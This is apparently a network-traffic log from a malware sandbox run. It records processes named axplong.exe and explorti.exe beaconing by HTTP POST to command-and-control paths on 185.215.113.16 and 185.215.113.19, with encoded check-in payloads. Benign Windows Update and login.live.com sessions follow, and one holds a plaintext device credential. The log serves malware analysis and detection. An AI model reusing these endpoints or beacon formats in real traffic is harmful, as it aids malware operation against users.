r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:11:03.185992956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	64254	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:11:03.213608980 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:11:04.010219097 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:11:04.018208981 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:11:04.377403975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	64255	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:11:03.307147026 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:11:04.167148113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:11:04.170005083 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:11:04.492897034 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:11:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:17 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1p5G+81pvP7punU&MD=N3O13Xaa HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-26 18:09:18 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 611d6040-d04e-4267-93c8-5c62af43d495 MS-RequestId: 8c97192a-0cf7-4af9-b2f9-84b4808e1c4e MS-CV: 6ldxHz58eEeBdpAV.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Jul 2024 18:09:17 GMT Connection: close Content-Length: 24490
2024-07-26 18:09:18 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-07-26 18:09:18 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:27 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-07-26 18:09:27 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-26 18:09:27 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 26 Jul 2024 18:08:27 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_BL2 x-ms-request-id: 8a03a918-a2de-4cc2-b70f-4b85c18c4609 PPServer: PPV: 30 H: BL02EPF0001D7B9 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:09:26 GMT Connection: close Content-Length: 1277
2024-07-26 18:09:27 UTC	1277	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:28 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-07-26 18:09:28 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-26 18:09:28 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 26 Jul 2024 18:08:28 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_SN1 x-ms-request-id: 2aa850d6-b3ea-443e-8711-4e6fa0a48df1 PPServer: PPV: 30 H: SN1PEPF0002F9A6 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:09:27 GMT Connection: close Content-Length: 1277
2024-07-26 18:09:28 UTC	1277	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49714	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:28 UTC	446	OUT	POST /ppsecure/deviceaddcredential.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 7642 Host: login.live.com
2024-07-26 18:09:28 UTC	7642	OUT	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 79 71 74 7a 6a 69 71 66 68 72 64 6e 6f 62 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 2c 71 76 5a 42 44 2e 78 4c 38 53 64 74 46 23 65 7a 6a 63 48 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02yqtzjiqfhrdnob</Membername><Password>,qvZBD.xL8SdtF#ezjcH</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
2024-07-26 18:09:31 UTC	542	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/xml Expires: Fri, 26 Jul 2024 18:08:29 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C542_BAY x-ms-request-id: 56623916-a964-475b-9fe1-e89c157d0eca PPServer: PPV: 30 H: PH1PEPF00011DB1 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:09:31 GMT Connection: close Content-Length: 17166
2024-07-26 18:09:31 UTC	15842	IN	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 34 30 30 46 32 37 36 37 42 41 37 43 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 30 62 30 38 36 39 36 37 2d 65 31 62 34 2d 34 30 63 36 2d 62 37 38 36 2d 62 36 32 65 38 66 39 31 35 31 62 66 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018400F2767BA7C</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="0b086967-e1b4-40c6-b786-b62e8f9151bf" LicenseID="3252b20c-d425-4711
2024-07-26 18:09:31 UTC	1324	IN	Data Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66 Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49715	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:32 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-07-26 18:09:32 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-26 18:09:33 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 26 Jul 2024 18:08:32 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C518_BAY x-ms-request-id: 1c029e1b-166e-44ad-a8ea-c623765c7937 PPServer: PPV: 30 H: PH1PEPF00011D32 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:09:33 GMT Connection: close Content-Length: 11389
2024-07-26 18:09:33 UTC	11389	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:34 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
